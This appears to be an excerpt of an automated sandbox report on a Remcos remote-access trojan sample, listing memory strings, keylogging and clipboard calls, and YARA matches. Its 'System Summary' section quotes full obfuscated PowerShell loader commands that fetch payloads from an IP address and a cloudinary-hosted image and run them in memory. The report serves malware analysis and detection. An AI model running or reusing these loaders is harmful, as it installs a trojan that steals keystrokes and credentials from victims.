                        Source: CasPol.exe, CasPol.exe, 00000010.00000002.2133399989.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
                        Source: CasPol.exe, CasPol.exe, 00000010.00000002.2133399989.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.com
                        Source: CasPol.exe, 00000010.00000002.2133399989.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                        Source: CasPol.exe, 00000010.00000002.2133399989.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
                        Source: powershell.exe, 00000003.00000002.1854595650.00000000086D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.c
                        Source: CasPol.exe, 0000000D.00000002.2140614877.0000000000F64000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
                        Source: CasPol.exe, 00000010.00000002.2133399989.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                        Source: powershell.exe, 00000003.00000002.1845557104.0000000004F31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2076283466.0000000004801000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                        Source: powershell.exe, 00000003.00000002.1845557104.0000000005088000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                        Source: powershell.exe, 00000007.00000002.2076283466.0000000004A6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee
                        Source: powershell.exe, 00000007.00000002.2076283466.0000000004A6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee;
                        Source: powershell.exe, 00000007.00000002.2076283466.0000000004A6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com
                        Source: powershell.exe, 00000007.00000002.2076283466.0000000004A6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com;
                        Source: powershell.exe, 00000007.00000002.2076283466.000000000586C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                        Source: powershell.exe, 00000007.00000002.2076283466.000000000586C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                        Source: powershell.exe, 00000007.00000002.2076283466.000000000586C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                        Source: powershell.exe, 00000007.00000002.2076283466.0000000004A6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
                        Source: powershell.exe, 00000007.00000002.2076283466.0000000004A6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com;
                        Source: powershell.exe, 00000007.00000002.2076283466.0000000004957000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                        Source: powershell.exe, 00000003.00000002.1845557104.000000000541F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                        Source: CasPol.exe, 0000000D.00000002.2141506219.00000000012AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_au
                        Source: CasPol.exe, 0000000D.00000002.2141506219.00000000012AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                        Source: CasPol.exe, 0000000D.00000002.2141506219.00000000012AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                        Source: CasPol.exe, 0000000D.00000002.2143185511.0000000001549000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.liv
                        Source: CasPol.exe, 0000000D.00000002.2141506219.00000000012AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                        Source: powershell.exe, 00000003.00000002.1854595650.0000000008698000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com64/WindowsPowerShell/v1.0/tX3.PowerShell.dll
                        Source: CasPol.exeString found in binary or memory: https://login.yahoo.com/config/login
                        Source: powershell.exe, 00000003.00000002.1850483491.0000000005F9C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2076283466.000000000586C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                        Source: powershell.exe, 00000007.00000002.2076283466.0000000004957000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com
                        Source: powershell.exe, 00000007.00000002.2076283466.0000000004957000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg
                        Source: powershell.exe, 00000007.00000002.2076283466.0000000004957000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpgt
                        Source: powershell.exe, 00000007.00000002.2076283466.0000000004A6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.gravatar.com
                        Source: powershell.exe, 00000007.00000002.2076283466.0000000004A6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://themes.googleusercontent.com
                        Source: powershell.exe, 00000007.00000002.2076283466.0000000004A6F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, CasPol.exe, 00000010.00000002.2133399989.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                        Source: CasPol.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                        Source: powershell.exe, 00000007.00000002.2076283466.0000000004A6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com;
                        Source: powershell.exe, 00000007.00000002.2076283466.0000000004A6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                        Source: unknownHTTPS traffic detected: 151.101.1.137:443 -> 192.168.2.4:49733 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 104.21.84.67:443 -> 192.168.2.4:49740 version: TLS 1.2

                        Key, Mouse, Clipboard, Microphone and Screen Capturing

                        barindex
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004099E4 SetWindowsHookExA 0000000D,004099D0,0000000012_2_004099E4
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,12_2_004159C6
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,12_2_004159C6
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,13_2_0040987A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,13_2_004098E2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 15_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,15_2_00406DFC
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 15_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,15_2_00406E9F
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 16_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,16_2_004068B5
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 16_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,16_2_004072B5
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,12_2_004159C6
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00409B10 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,12_2_00409B10
                        Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.2076283466.000000000586C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7696, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 8136, type: MEMORYSTR

                        E-Banking Fraud

                        barindex
                        Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000C.00000002.4186207219.000000000244F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.4182814346.0000000000669000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.4182814346.0000000000628000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.4182814346.0000000000650000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.2076283466.000000000586C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7696, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 8136, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                        Spam, unwanted Advertisements and Ransom Demands

                        barindex
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041BB71 SystemParametersInfoW,12_2_0041BB71
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041BB77 SystemParametersInfoW,12_2_0041BB77

                        System Summary

                        barindex
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $verilus = 'JGFwb3N0b2xpY25lc3MgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskdmlicm9tZXRlcnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRzYW5nYXBlbnVtID0gJHZpYnJvbWV0ZXJzLkRvd25sb2FkRGF0YSgkYXBvc3RvbGljbmVzcyk7JGhvcmlzbWFzY29wZSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRzYW5nYXBlbnVtKTskSmFuaW5lID0gJzw8QkFTRTY0X1NUQVJUPj4nOyR0cmlicm9tc2Fsb2wgPSAnPDxCQVNFNjRfRU5EPj4nOyRBcmFicyA9ICRob3Jpc21hc2NvcGUuSW5kZXhPZigkSmFuaW5lKTskcGx1cmlzcGlyYWwgPSAkaG9yaXNtYXNjb3BlLkluZGV4T2YoJHRyaWJyb21zYWxvbCk7JEFyYWJzIC1nZSAwIC1hbmQgJHBsdXJpc3BpcmFsIC1ndCAkQXJhYnM7JEFyYWJzICs9ICRKYW5pbmUuTGVuZ3RoOyRkZWNlcm5tZW50ID0gJHBsdXJpc3BpcmFsIC0gJEFyYWJzOyRhZmlyZSA9ICRob3Jpc21hc2NvcGUuU3Vic3RyaW5nKCRBcmFicywgJGRlY2Vybm1lbnQpOyR1bmRyZXNzZWQgPSAtam9pbiAoJGFmaXJlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRhZmlyZS5MZW5ndGgpXTskR2FzdG9uID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5kcmVzc2VkKTskY3V0aXRlcmVicmEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRHYXN0b24pOyRhbGxhbnRvaWRlYSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRhbGxhbnRvaWRlYS5JbnZva2UoJG51bGwsIEAoJzAvdnlpZEIvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRiaW9ncmFwaGVlcycsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywgJ0Nhc1BvbCcsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnMScsJyRiaW9ncmFwaGVlcycpKTs=';$spinispicule = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($verilus));Invoke-Expression $spinispicule
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"Jump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $verilus = 'JGFwb3N0b2xpY25lc3MgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskdmlicm9tZXRlcnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRzYW5nYXBlbnVtID0gJHZpYnJvbWV0ZXJzLkRvd25sb2FkRGF0YSgkYXBvc3RvbGljbmVzcyk7JGhvcmlzbWFzY29wZSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRzYW5nYXBlbnVtKTskSmFuaW5lID0gJzw8QkFTRTY0X1NUQVJUPj4nOyR0cmlicm9tc2Fsb2wgPSAnPDxCQVNFNjRfRU5EPj4nOyRBcmFicyA9ICRob3Jpc21hc2NvcGUuSW5kZXhPZigkSmFuaW5lKTskcGx1cmlzcGlyYWwgPSAkaG9yaXNtYXNjb3BlLkluZGV4T2YoJHRyaWJyb21zYWxvbCk7JEFyYWJzIC1nZSAwIC1hbmQgJHBsdXJpc3BpcmFsIC1ndCAkQXJhYnM7JEFyYWJzICs9ICRKYW5pbmUuTGVuZ3RoOyRkZWNlcm5tZW50ID0gJHBsdXJpc3BpcmFsIC0gJEFyYWJzOyRhZmlyZSA9ICRob3Jpc21hc2NvcGUuU3Vic3RyaW5nKCRBcmFicywgJGRlY2Vybm1lbnQpOyR1bmRyZXNzZWQgPSAtam9pbiAoJGFmaXJlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRhZmlyZS5MZW5ndGgpXTskR2FzdG9uID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5kcmVzc2VkKTskY3V0aXRlcmVicmEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRHYXN0b24pOyRhbGxhbnRvaWRlYSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRhbGxhbnRvaWRlYS5JbnZva2UoJG51bGwsIEAoJzAvdnlpZEIvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRiaW9ncmFwaGVlcycsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywgJ0Nhc1BvbCcsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnMScsJyRiaW9ncmFwaGVlcycpKTs=';$spinispicule = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($verilus));Invoke-Expression $spinispiculeJump to behavior
                        Source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 00000007.00000002.2076283466.000000000586C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: Process Memory Space: powershell.exe PID: 7696, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: Process Memory Space: powershell.exe PID: 7696, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                        Source: Process Memory Space: CasPol.exe PID: 8136, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg